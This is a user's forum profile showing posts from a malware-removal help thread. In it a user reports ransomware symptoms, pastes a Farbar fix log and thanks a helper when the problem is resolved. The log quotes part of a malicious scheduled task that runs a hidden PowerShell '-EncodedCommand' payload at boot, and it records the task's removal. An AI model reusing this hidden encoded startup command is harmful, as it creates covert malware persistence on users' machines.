Jump to content


  • Content Count

  • Joined

  • Last visited

About chandraquan

  • Rank
    New Member
  1. NICE, Powershell no longer automatically run when windows starts up. CPU usage no longer high Malwarebytes no longer blocking suspicious IP. thank you Aura.
  2. Hi Aura, thank you for reopening the topic. Here the log after i hit "fix" button with fixlist you've attached. Fix result of Farbar Recovery Scan Tool (x64) Version: 21.01.2018 Ran by Quan (22-01-2018 12:24:40) Run:1 Running from D:\farbar Loaded Profiles: Quan (Available Profiles: Quan & Presentasi) Boot Mode: Normal ============================================== fixlist content: ***************** Task: {00C35954-49AB-475B-B042-C6C1B3D17C68} - System32\Tasks\d2d7fc3b-166f-5c4c-5cd26c7af69743e4 => C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABZAGMAWABtAHAAYgBGAEgANwAgAD0AIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFMAaABlAGwAbAAiADsAJABiAEIASwBEAGUARAA0ACAAPQAgACIAewBFADEARgAwADgAQgBDADQALQA0ADMA (the data entry has 8048 more characters). AlternateDataStreams: C:\Windows:nlsPreferences [386] AlternateDataStreams: C:\ProgramData\TEMP:A1EDB939 [114] AlternateDataStreams: C:\Users\Quan\AppData\Local\Temporary Internet Files:a2hwWZ5yaeiwCL5kTfBDjfYiO6SR [2066] AlternateDataStreams: C:\Users\Quan\AppData\Local\Temporary Internet Files:nHikZdldrM6F4HXVwfkQPOsv [2116] ***************** HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{00C35954-49AB-475B-B042-C6C1B3D17C68} => could not remove key. ErrorCode1: 0x00000002 "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00C35954-49AB-475B-B042-C6C1B3D17C68}" => removed successfully C:\Windows\System32\Tasks\d2d7fc3b-166f-5c4c-5cd26c7af69743e4 => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\d2d7fc3b-166f-5c4c-5cd26c7af69743e4" => removed successfully C:\Windows => ":nlsPreferences" ADS removed successfully C:\ProgramData\TEMP => ":A1EDB939" ADS removed successfully C:\Users\Quan\AppData\Local\Temporary Internet Files => ":a2hwWZ5yaeiwCL5kTfBDjfYiO6SR" ADS removed successfully C:\Users\Quan\AppData\Local\Temporary Internet Files => ":nHikZdldrM6F4HXVwfkQPOsv" ADS removed successfully ==== End of Fixlog 12:24:41 ==== :) Fixlog.txt
  3. I should thank to Malwarebytes to remove the Ransomware from my PC. unfotunately, it doesn't fix my computer completely. i read a post so i run the same thing like it was told. please help me to analyze my FR i should fixST and Addition file reported by farbar recovery tool. what i should do next? Addition.txt FRST.txt
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.